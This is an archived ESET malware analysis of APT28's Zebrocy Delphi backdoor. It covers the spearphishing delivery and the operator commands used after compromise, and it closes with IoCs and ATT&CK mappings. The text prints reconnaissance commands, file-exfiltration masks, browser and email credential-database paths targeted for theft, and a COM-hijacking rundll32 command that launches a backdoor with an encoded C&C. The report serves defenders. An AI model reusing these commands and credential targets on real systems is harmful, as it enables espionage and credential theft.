{ "id": "e47ff77c-4efa-4088-b117-d1896c3da7cc", "created_at": "2026-04-06T00:18:22.121671Z", "updated_at": "2026-04-10T13:12:42.26166Z", "deleted_at": null, "sha1_hash": "b6ae0db93e7425fe38ec31e89a9508fb68d1a06d", "title": "A journey to Zebrocy land", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 374292, "plain_text": "A journey to Zebrocy land\r\nBy ESET Research\r\nArchived: 2026-04-05 20:34:15 UTC\r\nWhat happens when a victim is compromised by a backdoor and the operator is controlling it? It’s a difficult question that is\r\nnot possible to answer entirely by reverse engineering the code. In this article we will analyze commands sent by the\r\noperator to their targets.\r\nThe Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – has been operating since at least 2004 and\r\nhas made headlines frequently in past years.\r\nRecently, we unveiled the existence of a UEFI rootkit, called LoJax, which we attribute to the Sednit group. This is a first\r\nfor an APT group, and shows Sednit has access to very sophisticated tools to conduct its espionage operations.\r\nThree years ago, the Sednit group unleashed new components targeting victims in various countries in the Middle East and\r\nCentral Asia. Since then, the number and diversity of components has increased drastically. ESET researchers and\r\ncolleagues from other companies have documented these components; however, in this article we will focus on what's\r\nbeyond the compromise, what the operators do once a victim system is running a Zebrocy Delphi backdoor.\r\nThe bear’s bait\r\nAt the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs\r\nthat delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing.\r\nHowever, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it\r\nhad used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social\r\nengineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the\r\nshortened URL used in this campaign.\r\nFigure 1. Statistics of the Bitly URL\r\nAbout 20 clicks were recorded on this link in the same week that the URL was created, and these presumably downloaded\r\nthe target archive. Let’s keep in mind that this may mean fewer than 20 potential victims, as victims may have clicked on the\r\nURL twice, or maybe even more times, because the outcome was not what they expected... as we will describe below.\r\nWhile ESET telemetry data indicates that this URL was delivered by spearphishing emails, we don’t have a sample of such\r\nan email. The shortened URL leads the victim to an IP-address-based URL, where the archived payload is located.\r\nUnfortunately, without the email message, we don't know if there are any instructions for the user, if there is any further\r\nsocial engineering, or if it relies solely on the victim's curiosity. The archive contains two files; the first is an executable file,\r\nwhile the second is a decoy PDF document.\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 1 of 7\n\nFigure 2. Files extracted from the archive (Google Translate suggests “CATALOGUE - (2018).exe” and “Order 97.pdf”\r\nfrom the Ukrainian)\r\nNote there is a typo in the executable's filename; it should be “ДОВIДНИК” instead of “ДОВIДНIК”. Once the binary is\r\nexecuted, a password prompt dialog box opens. The result of the password validation will always be wrong, but after the\r\napparent validation attempt, the decoy PDF document is opened. That document appears to be empty, but the downloader,\r\nwhich is written in Delphi, continues running in the background. The IP address is also used in the URL hardcoded into the\r\nfirst binary downloader.\r\nThe bear’s lair\r\nThe Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy\r\ndownloaders. Once again this downloader is as straightforward as the Zebrocy gang's other downloaders. It creates an ID\r\nand it downloads a new, interesting backdoor, (this time) written in Delphi.\r\nAs we explained in our most recent blogpost about Zebrocy, the configuration of the backdoor is stored in in the resource\r\nsection and is split into four different hex-encoded, encrypted blobs. These blobs contain the different parts of the\r\nconfiguration.\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 2 of 7\n\nFigure 3. Overview of the resource section\r\nOnce the backdoor sends basic information about its newly compromised system, the operators take control of the backdoor\r\nand start to send commands right away.\r\nHence, the time between the victim running the downloader and the operators' first commands is only a few minutes.\r\nHow the bear hunts\r\nIn this section we describe in more detail the commands performed manually by the operators through their Delphi\r\nbackdoor.\r\nThe commands available are located in one of the configuration blobs mentioned earlier (the \"commands\" blob in Figure 3).\r\nThe number of supported commands has increased over time, with the latest version of the backdoor having more than\r\nthirty. As we did not identify a pattern in the order which the commands are invoked, we believe the operators are executing\r\nthem manually.\r\nThe first set of commands gathers information about the victim's computer and environment:\r\nCommands Arguments\r\nSCREENSHOT None\r\nSYS_INFO None\r\nGET_NETWORK None\r\nSCAN_ALL None\r\nThe commands above are commonly executed when the operators first connect to a newly activated backdoor. They don’t\r\nhave any arguments, and they are quite self-explanatory. Other commands commonly seen executed shortly after these\r\nbackdoors are activated, listed below:\r\nCommands Arguments\r\nREG_GET_KEYS_VALUES\r\nHKEY_CURRENT_USER\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\r\nDOWNLOAD_DAY(30)\r\nc:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;\r\n*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;\r\nd:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;\r\n*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;\r\nDOWNLOAD_DAY(1)\r\nc:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg\r\n*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;\r\nd:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg\r\n*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;\r\nCMD_EXECUTE\r\necho %APPDATA%\r\nipconfig /all\r\nnetstat -aon\r\nCMD_EXECUTE\r\nwmic process get Caption,ExecutablePath\r\nreg query\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nThose who already have read our previous articles about Zebrocy will notice that more or less the same kind of information\r\nis sent, over and over again by previous stages. This information is requested within a few minutes of initial compromise\r\nand the amount of data the operator will have to deal with is quite considerable.\r\nIn order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims'\r\nmachines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex\r\nBrowser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of\r\nMicrosoft Outlook from 1997 through 2016:\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 3 of 7\n\nCommand Arguments\r\nUPLOAD_AND_EXECUTE_FILE\r\nC:\\ProgramData\\Office\\MS\\msoffice.exe\r\n[…]\r\n4D5A9000…\r\nThese dumpers create log files indicating the presence or absence of potential databases to dump:\r\nCommand Arguments\r\nDOWNLOAD_LIST\r\nC:\\ProgramData\\Office\\MS\\out.txt\r\nC:\\ProgramData\\Office\\MS\\text.txt\r\nThe current dumper contains the following output when there are no databases to dump:\r\n%LOCALAPPDATA%\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data not found\r\n%LOCALAPPDATA%\\Chromium\\User Data\\Default\\Login Data not found\r\n%LOCALAPPDATA%\\7Star\\7Star\\User Data\\Default\\Login Data not found\r\n%LOCALAPPDATA%\\CentBrowser\\User Data\\Default\\Login Data not found\r\nThese dumpers are quickly removed once they have done their job. Moreover, the backdoor contains a list of filenames\r\nrelated to credentials from software listed below (database names):\r\nkey3.db Firefox private keys (now named key4.db)\r\ncert8.db Firefox certificate database\r\nlogins.json Firefox encrypted password database\r\naccount.cfn The Bat! (email client) account credentials\r\nwand.dat Opera password database\r\nThe operators take care of retrieving these databases if they are present on the victim’s computer.\r\nCommand Arguments\r\nDOWNLOAD_LIST\r\n%APPDATA%\\The Bat!\\Account.CFN\r\n%APPDATA%\\The Bat!\\[REDACTED]\\Account.CFN\r\nThe operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used\r\nwhen the operators are aware of the presence of interesting files on the computer.\r\nFinally, depending on how interesting the victim is, they malware operators may deploy another custom backdoor. This\r\nbackdoor is executed using the CMD_EXECUTE command:\r\nCommand Arguments\r\nCMD_EXECUTE\r\nreg add \"HKCU\\Software\\Classes\\CLSID\\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\" /ve /d \"Reliability Maintenance Control Panel\" /\r\nrundll32.exe \"%APPDATA%\\Microsoft\\WinSupport\\RMC\\mtrcpl.dll\",#1 687474703A2F2F[REDACTED]\r\ndir /s /b /o:gn %APPDATA%\\Microsoft\\\r\nThere are some interesting facts here. First, they use COM object hijacking to make the malware persistent on the system\r\neven though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C\u0026C used by the\r\ncustom backdoor while in the Delphi backdoor the C\u0026C is embedded in the configuration.\r\nThe two Delphi backdoors, the common one and the one above, are quite similar but contain these interesting tweaks:\r\nDelphi backdoor Downloaded Delphi backdoor\r\nDelphi compiler version 14.0-15.0 32.0\r\n32/64-bit 32-bit 64-bit\r\nConfiguration location resource section no config (C\u0026C is passed as an argument)\r\nNumber of commands 5 3\r\nEncryption algorithm AES ECB custom\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 4 of 7\n\nDelphi backdoor Downloaded Delphi backdoor\r\nLifetime on the computer a few days a few hours\r\nOnce again, it’s not very clear what the purpose of this custom backdoor is. The detection ratio is definitely lower in\r\ncomparison to the “usual” backdoor. The very short timeframe where this backdoor is on the system and operating makes it\r\nharder to retrieve. Once its operators complete their evil deeds, they quickly remove it.\r\nSummary\r\nObserving commands used in the wild by the operator is quite interesting. They are gathering a considerable amount of\r\ninformation on the compromised target and they are not worried about duplicated data. It shows a large gap between the\r\ndevelopment strategy and what operators do in practice. Backdoors with custom configuration and modules are deployed\r\nvery carefully, which indicates some precautions to avoid ending up in the hands of researchers.\r\nThe first set of commands is the same and executed during a very short timeframe, which raises another question: is it\r\nautomated?\r\nIndicators of Compromise (IoCs)\r\nDistribution URL\r\nhttp://45.124.132[.]127/DOVIDNIK - (2018).zip\r\nC\u0026C server\r\nhttp://45.124.132[.]127/action-center/centerforserviceandaction/service-and-action.php\r\nSHA-1 ESET detection names\r\n48f8b152b86bed027b9152725505fbf4a24a39fd Win32/TrojanDownloader.Sednit.CMT\r\n1e9f40ef81176190e1ed9a0659473b2226c53f57 Win32/HackTool.PSWDump.D\r\nbfa26857575c49abb129aac87207f03f2b062e07 Win32/PSW.Agent.OGE\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nInitial\r\nAccess\r\nT1192 Spearphishing Link\r\nSpearphishing emails using a URL-shortener service to\r\ntrick the victim into clicking on a link to a zip file\r\ncontaining malicious files.\r\nExecution\r\nT1204 User Execution\r\nTricks users into running an executable with an icon that\r\nlooks like a Microsoft Word document.\r\nT1085 Rundll32\r\nrundll32.exe has been used to run a new, downloaded,\r\nmalicious DLL.\r\nT1047\r\nWindows\r\nManagement\r\nInstrumentation\r\nWMI commands to gather victim host details.\r\nT1053 Scheduled Task Schedule task to execute malicious binaries.\r\nPersistence\r\nT1060\r\nRegistry Run Keys /\r\nStartup Folder\r\nRegistry key\r\nHKCU\\Software\\Microsoft\\CurrentVersion\\Run\\ used for\r\npersistence.\r\nT1122\r\nComponent Object\r\nModel Hijacking\r\nCOM hijacking for persistence.\r\nDefense\r\nEvasion\r\nT1107 File Deletion Deletes files (binaries and files created) after usage.\r\nT1089\r\nDisabling Security\r\nTools\r\nKills processes\r\nDiscovery T1012 Query Registry Registry keys enumeration\r\nT1057 Process Discovery Lists running processes\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 5 of 7\n\nTactic ID Name Description\r\nT1082\r\nSystem Information\r\nDiscovery\r\nUses systeminfo command to gather information about\r\nthe victim.\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nUses echo ENV command to list the content of a\r\ndirectory.\r\nCollection\r\nT1005\r\nData from Local\r\nSystem\r\nScans files that match extensions listed in the malware.\r\nT1039\r\nData from Network\r\nShared Drive\r\nEnumerates remote and local drives and then exfiltrates\r\nfiles matching specific extensions.\r\nT1025\r\nData from Removable\r\nMedia\r\nEnumerates remote and local drives and then exfiltrates\r\nfiles matching specific extensions.\r\nT1074 Data Staged Creates file containing path of all files to exfiltrate.\r\nT1056 Input Capture Keylogger feature.\r\nT1113 Screen Capture Screenshot feature.\r\nExfiltration\r\nT1020\r\nAutomated\r\nExfiltration\r\nAutomatically prepare a file with all file paths to retrieve\r\nand send it.\r\nT1022 Data Encrypted\r\nData sent are hex-encoded, encrypted with a known\r\nalgorithm or a custom one.\r\nT1041\r\nExfiltration Over\r\nCommand and\r\nControl Channel\r\nData are exfiltrated to a C\u0026C server.\r\nCommand\r\nAnd Control\r\nT1043 Commonly Used Port\r\nDownloaders and backdoors use ports 80 or 443 to\r\ncommunicate with the C\u0026C server.\r\nT1024\r\nCustom\r\nCryptographic\r\nProtocol\r\nData sent are hex\r\nencoded, encrypted\r\nwith AES or a custom\r\nalgorithm.\r\nT1132 Data Encoding\r\nData sent are hex-encoded, encrypted\r\nwith a known\r\nalgorithm or a custom\r\none.\r\nT1001\r\nData\r\nObfuscation\r\nData sent are hex-encoded, encrypted\r\nwith a known\r\nalgorithm or a custom\r\none.\r\nT1008\r\nFallback\r\nChannels\r\nA fallback C\u0026C\r\nserver is embedded in\r\nthe configuration.\r\nT1079 Multilayer\r\nEncryption\r\nData sent are hex-encoded, encrypted\r\nwith a known\r\nalgorithm or a custom\r\none.\r\nT1071\r\nStandard\r\nApplication\r\nLayer Protocol\r\nHTTP, HTTPS are\r\nused to communicate.\r\nT1032 Standard\r\nCryptographic\r\nProtocol\r\nData sent are hex-encoded, encrypted\r\nwith a known\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 6 of 7\n\nTactic ID Name Description\r\nalgorithm or a custom\r\none.\r\nSource: https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 7 of 7\n\n https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ \nTactic ID Name Description\n algorithm or a custom\n one. \nSource: https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ \n Page 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/" ], "report_names": [ "journey-zebrocy-land" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434702, "ts_updated_at": 1775826762, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b6ae0db93e7425fe38ec31e89a9508fb68d1a06d.pdf", "text": "https://archive.orkl.eu/b6ae0db93e7425fe38ec31e89a9508fb68d1a06d.txt", "img": "https://archive.orkl.eu/b6ae0db93e7425fe38ec31e89a9508fb68d1a06d.jpg" } }